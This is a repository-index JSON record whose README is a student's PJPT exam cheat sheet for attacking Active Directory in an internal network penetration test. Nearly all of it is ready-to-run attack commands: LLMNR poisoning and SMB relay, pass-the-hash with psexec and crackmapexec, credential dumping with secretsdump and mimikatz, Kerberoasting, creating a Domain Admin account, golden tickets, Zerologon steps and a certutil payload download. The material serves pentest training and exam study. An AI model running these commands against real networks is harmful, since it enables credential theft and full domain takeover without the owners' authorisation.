{"id":18426653,"url":"https://github.com/dr4ks/pjpt_cheatsheet","last_synced_at":"2026-01-24T15:06:56.127Z","repository":{"id":189476915,"uuid":"678241705","full_name":"Dr4ks/PJPT_CheatSheet","owner":"Dr4ks","description":"This is CheatSheet which I used on PJPT exam to fully compromise Domain Controller by doing internal network penentration testing.","archived":false,"fork":false,"pushed_at":"2023-08-20T09:35:36.000Z","size":550,"stargazers_count":72,"open_issues_count":0,"forks_count":10,"subscribers_count":2,"default_branch":"main","last_synced_at":"2025-04-13T20:04:14.085Z","etag":null,"topics":["active-directory","ad","asrep-roasting","cheatsheet","dc","dns","domain-controller","internal-network-pentesting","kerberoasting","kerberos","kerberos-authentication","ldap","pentesting","pentesting-methodology","pjpt","pjpt-cheatsheet","pjpt-exam","security-checklist","tcm-security"],"latest_commit_sha":null,"homepage":"","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Dr4ks.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null}},"created_at":"2023-08-14T05:05:40.000Z","updated_at":"2025-04-07T13:35:24.000Z","dependencies_parsed_at":"2023-08-20T10:55:55.327Z","dependency_job_id":"7d035bed-4265-4133-9cf5-ef8e8dd7b17e","html_url":"https://github.com/Dr4ks/PJPT_CheatSheet","commit_stats":null,"previous_names":["dr4ks/pjpt_cheatsheet"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/Dr4ks/PJPT_CheatSheet","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Dr4ks%2FPJPT_CheatSheet","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Dr4ks%2FPJPT_CheatS
heet/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Dr4ks%2FPJPT_CheatSheet/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Dr4ks%2FPJPT_CheatSheet/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Dr4ks","download_url":"https://codeload.github.com/Dr4ks/PJPT_CheatSheet/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Dr4ks%2FPJPT_CheatSheet/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":28730309,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-01-24T10:24:43.181Z","status":"ssl_error","status_checked_at":"2026-01-24T10:24:36.112Z","response_time":89,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["active-directory","ad","asrep-roasting","cheatsheet","dc","dns","domain-controller","internal-network-pentesting","kerberoasting","kerberos","kerberos-authentication","ldap","pentesting","pentesting-methodology","pjpt","pjpt-cheatsheet","pjpt-exam","security-checklist","tcm-security"],"created_at":"2024-11-06T05:08:28.243Z","updated_at":"2026-01-24T15:06:56.108Z","avatar_url":"https://github.com/Dr4ks.png","language":null,"funding_links":[],"categories":[],"sub_categories":[],"readme":"# Hi, I'm Dr4ks! 
👋\n\n## 🚀 About Me\nI'm a Cyber Security student.\n\n## 🔗 Links\n[![linkedin](https://img.shields.io/badge/linkedin-0A66C2?style=for-the-badge\u0026logo=linkedin\u0026logoColor=white)](https://www.linkedin.com/in/sahib-humbatzada-42b082223/)\n[![hackerrank](https://img.shields.io/badge/HackerRank-2EC866?style=for-the-badge\u0026logo=hackerrank\u0026logoColor=white)](https://www.hackerrank.com/Dr4ks)\n[![tryhackme](https://img.shields.io/badge/tryhackme-1DB954?style=for-the-badge\u0026logo=tryhackme\u0026logoColor=white)](https://tryhackme.com/p/Dr4ks)\n[![github](https://img.shields.io/badge/GitHub-100000?style=for-the-badge\u0026logo=github\u0026logoColor=white)](https://github.com/Dr4ks)\n\n\n## Content\n- [Recon](#recon)\n- [Enumeration](#enumeration)\n- [Initial attacks for Active Directory](#initial-attacks-for-active-directory)\n- [Post Compromise Enumeration for Active Directory](#post-compromise-enumeration-for-active-directory)\n- [Post Compromise Attacks for Active Directory](#post-compromise-attacks-for-active-directory)\n- [After compromising Domain](#after-compromising-domain)\n- [Additional AD attacks](#additional-ad-attacks)\n- [AD Case Studies](#ad-case-studies)\n- [Post Exploitation](#post-exploitation)\n- [Result](#result)\n\n
# Recon\nIntroduction is here!\n\n![image1](images/image1.png)\n\nDiscovering email addresses (links)=\u003e\n\nhttps://hunter.io/\n\nhttps://phonebook.cz/\n\nhttps://www.voilanorbert.com/\n\nhttps://tools.emailhippo.com/\n\nhttps://email-checker.net/\n\n\nGathering breached credentials=\u003e\n\nhttps://github.com/hmaverickadams/breach-parse\n\nhttps://dehashed.com/\n\nHunting subdomains=\u003e\n\nhttps://crt.sh/\n\n```bash\nsublist3r -d tesla.com -t 100\n```\n\nIdentifying website technologies=\u003e\n\nhttps://builtwith.com/\n\nWappalyzer browser extension\n\n```bash\nwhatweb https://tesla.com\n```\n\nGoogle Dorking=\u003e\n\nsite:tesla.com  (returns results only from the tesla.com website)\n\n-www  (excludes results that contain 'www')\n\nfiletype:docx  (returns only results whose file type is docx)\n\n
# Enumeration\n```bash\narp-scan -l\n```\n\n```bash\nnetdiscover -r 192.168.57.0/24\n```\n\n```bash\nnmap -T4 -p- -sS -A 192.168.57.134\n```\n\n
# Initial attacks for Active Directory\n\nLLMNR Poisoning=\u003e\n![LLMNR](images/image2.png)\n\nHow to do=\u003e\n\n1. Start Responder:\n```bash\nresponder -I tun0 -dwPv\n```\n\n2. Type your IP in this format into the File Explorer search bar:\n```bash\n//attacker_ip\n```\n\n3. Responder will capture the NTLMv2 hash; crack it like this:\n```bash\nhashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt\n```\n\nSMB Relay=\u003e\nFor this attack to work, SMB signing must be **disabled** on the targets.\n\n1. Check SMB signing:\n```bash\nnmap --script=smb2-security-mode.nse -p445 10.0.0.0/24\n```\n\n2. Start Responder:\n```bash\nresponder -I tun0 -dwPv\n```\n\n3. Edit the Responder configuration in '/etc/responder/Responder.conf':\nyou need to **disable** (set to Off) the HTTP and SMB servers, so that Responder does not answer those connections itself\n\n4. Set up your relay\n```bash\nsudo ntlmrelayx.py -tf targets.txt -smb2support\n```\n\n5. Type your IP in this format into the File Explorer search bar:\n```bash\n//attacker_ip\n```\n\nReminder! Run commands via ntlmrelayx.py\n```bash\nsudo ntlmrelayx.py -tf targets.txt -smb2support -c \"whoami\"\n```\n\nGaining Shell Access=\u003e\n\nFirst way:\nWe can use Metasploit for this.\n```bash\nuse exploit/windows/smb/psexec\nset SMBDomain MARVEL.local\nset SMBUser fcastle\nset SMBPass Password1\n```\n\nSecond way:\nWe can use psexec.py to access the host.\n```bash\npsexec.py marvel.local/fcastle:'Password1'@10.0.0.25\n```\n\nThird way:\nAgain we use psexec.py, but with the user's hashes (LM:NT); this is a Pass-the-Hash attack.\n```bash\npsexec.py administrator@10.0.0.25 --hashes [LM-HASH]:[NTLM-HASH]\n```\n\nFourth way:\nIf psexec.py does not work for the third way, use **wmiexec.py** as below.\n```bash\nwmiexec.py administrator@192.168.138.137 --hashes [LM-HASH]:[NTLM-HASH]\n```\n\n\nIPv6 attacks=\u003e\n\n1. Start **mitm6** for the target domain\n```bash\nsudo mitm6 -d marvel.local\n```\n\n2. At the same time, start **ntlmrelayx.py**\n```bash\nntlmrelayx.py -6 -t ldaps://192.168.138.136 -wh fakewpad.marvel.local -l lootme\n```\n\n3. You will get results like this in **'/home/kali/lootme/domain_computers.html'**\n\n\n
# Post Compromise Enumeration for Active Directory\n\nDomain Enumeration with **ldapdomaindump**=\u003e\n1. Run the command below\n```bash\nsudo ldapdomaindump ldaps://192.168.138.136 -u 'MARVEL\\fcastle' -p Password1\n```\n2. Then run **ls** to see the generated files.\n\nDomain Enumeration with **bloodhound-python**=\u003e\n1. Run the command below\nThe **-ns option** is your DC's (Domain Controller's) IP\n\n```bash\nsudo bloodhound-python -d MARVEL.local -u fcastle -p Password1 -ns [DC-IP] -c all\n```\n\n2. Then run **ls** to see the generated files.\nIf you want to see them in the GUI, just upload the .json files into BloodHound.\n\nDomain Enumeration with **Plumhound**=\u003e\n\nWhen you run the commands below, **BloodHound** should be up!\n1. Easy mode:\n```bash\nsudo python3 PlumHound.py --easy -p [YOUR_PASS]\n```\n\n2. Run all of the default tasks:\n```bash\nsudo python3 PlumHound.py -x tasks/default.tasks -p [YOUR_PASS]\n```\n\n3. Finally, open Firefox to look at the results.\n\n
# Post Compromise Attacks for Active Directory\n\nPass the Password=\u003e\n```bash\ncrackmapexec smb 10.0.0.0/24 -u fcastle -d MARVEL.local -p Password1\n```\n\nGrab some local hashes=\u003e\n\nFirst way:\n\nFor this, we can use meterpreter's hashdump.\n```bash\nuse windows/smb/psexec\nrun\nhashdump # you will get the hashes of the local users\n```\n\nSecond way:\n```bash\nsecretsdump.py MARVEL.local/fcastle:Password1@10.0.0.25\n```\n\nThird way:\n```bash\nsecretsdump.py administrator:@192.168.138.138 --hashes [LM-HASH]:[NT-HASH]\n```\n\nPass the Hash=\u003e\n```bash\ncrackmapexec smb 10.0.0.0/24 -u administrator -H [USER-HASH]\n```\n\nReminder! Cheatsheet of crackmapexec\n\n- --local-auth : authenticate locally to each target\n- --sam : dump SAM hashes from target systems\n- --lsa : dump LSA secrets from target systems\n- --shares : enumerate shares and access\n- -L : list available modules for each protocol\n- -M : specify a module\n\nHow to use an **available** module with crackmapexec?\n```bash\ncrackmapexec smb 192.168.138.0/24 -u administrator -H [USER-HASH] --local-auth -M lsassy\n```\n\n**Reminder**! If you want to access the crackmapexec database, just use the **cmedb** command\n\n\n\nKerberoasting=\u003e\n\n1. Get SPNs\n```bash\npython GetUserSPNs.py MARVEL.local/fcastle:Password1 -dc-ip [DC_IP] -request\n```\n\n2. Crack the hash\n```bash\nhashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt\n```\n\nToken Impersonation=\u003e\n\nTo list all tokens in meterpreter\n```bash\nmeterpreter \u003e list_tokens -u\n```\n\nTo impersonate a user:\n```bash\nmeterpreter \u003e impersonate_token MARVEL\\\\administrator\n```\n\nTo dump hashes:\n```bash\nmimikatz(powershell) # privilege::debug\nmimikatz(powershell) # LSADump::LSA /patch\n```\n\nHow to add a new user:\n```powershell\nnet user /add hawkeye Password1@ /domain\n```\n\nHow to add the user to a group:\n```powershell\nnet group \"Domain Admins\" hawkeye /ADD /DOMAIN\n```\n\nGPP attack (cPassword attack)=\u003e\nSample Groups.xml file=\u003e\n![image3](images/image3.jpg)\n\nCracking the password=\u003e\n![image4](images/image4.jpg)\n\n\nCredential Dumping with Mimikatz=\u003e\n\nMimikatz: https://github.com/gentilkiwi/mimikatz\n\nThe command below is a must in Mimikatz!\n```bash\nmimikatz # privilege::debug\n```\n\nReminder! When you type a module name followed by \"::\" and then press Tab, you get **HELP**\n\n1. sekurlsa : This module is used to enumerate credentials.\nExample:\n```bash\nmimikatz # sekurlsa::logonPasswords\n```\n\n
# After compromising Domain\n\nDumping NTDS.dit=\u003e\n```bash\nsecretsdump.py MARVEL.local/pparker:'Password2'@192.168.138.132 -just-dc-ntlm\n```\n\nGolden Ticket Attacks=\u003e\n\n1. First, we get the NTLM hash, SID and relative ID of the krbtgt account from the KDC\n```bash\nmimikatz # privilege::debug\nmimikatz # lsadump::lsa /inject /name:krbtgt\n```\n\n2. Then, using the creds above, we create the golden ticket.\n```bash\nkerberos::golden /User:Administrator /domain:marvel.local /sid:[SID_VALUE] /krbtgt:[KRBTGT_NTLM_HASH] /id:[RELATIVE_ID] /ptt\n```\n\n
# Additional AD attacks\n\nCVE-2020-1472=\u003e This is abusing **Zerologon**.\n\nURL=\u003e https://github.com/SecuraBV/CVE-2020-1472\n\nHow to do=\u003e\n\n1. We get the Administrator hash from here\n```bash\nsecretsdump.py -just-dc MARVEL/HYDRA-DC\\$@192.168.138.132\n```\n\n2. Now we need to get 'plain_password_hex' by using the hash in the format below.\n```bash\nsecretsdump.py administrator@192.168.138.132 --hashes [LM:NTLM_HASH]\n```\n\n3. Now we use the script from GitHub as below\n```bash\npython3 restorepassword.py MARVEL/HYDRA-DC@HYDRA-DC -target-ip 192.168.138.132 -hexpass [HEX_VALUE]\n```\n\n\nCVE-2021-1675=\u003e This is **PrintNightmare**\n\nURL=\u003e https://github.com/cube0x0/CVE-2021-1675\n\nHow to check for this=\u003e For this, we use the rpcdump.py script\n```bash\nrpcdump.py @192.168.1.10 | egrep 'MS-RPRN|MS-PAR'\n```\n\n
# AD Case Studies\n\n- Case 1: https://tcm-sec.com/pentest-tales-001-you-spent-how-much-on-security\n- Case 2: https://tcm-sec.com/pentest-tales-002-digging-deep\n\n
# Post Exploitation\n\nFile Transfers=\u003e\n\n1. On Windows (PowerShell)\n```powershell\ncertutil.exe -urlcache -f http://10.10.10.10/file.txt file.txt\n```\n\n2. Start an HTTP server to share the files in the current directory\n```bash\npython3 -m http.server --bind [your_ip] 
[port]\n```\n\n# Result\n[Click me!](https://www.linkedin.com/posts/dr4ks_pjpt-tcmsecurity-activity-7096676619943034880-t1mH/)\n## Authors\n- [@dr4ks](https://www.github.com/Dr4ks)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdr4ks%2Fpjpt_cheatsheet","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fdr4ks%2Fpjpt_cheatsheet","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdr4ks%2Fpjpt_cheatsheet/lists"}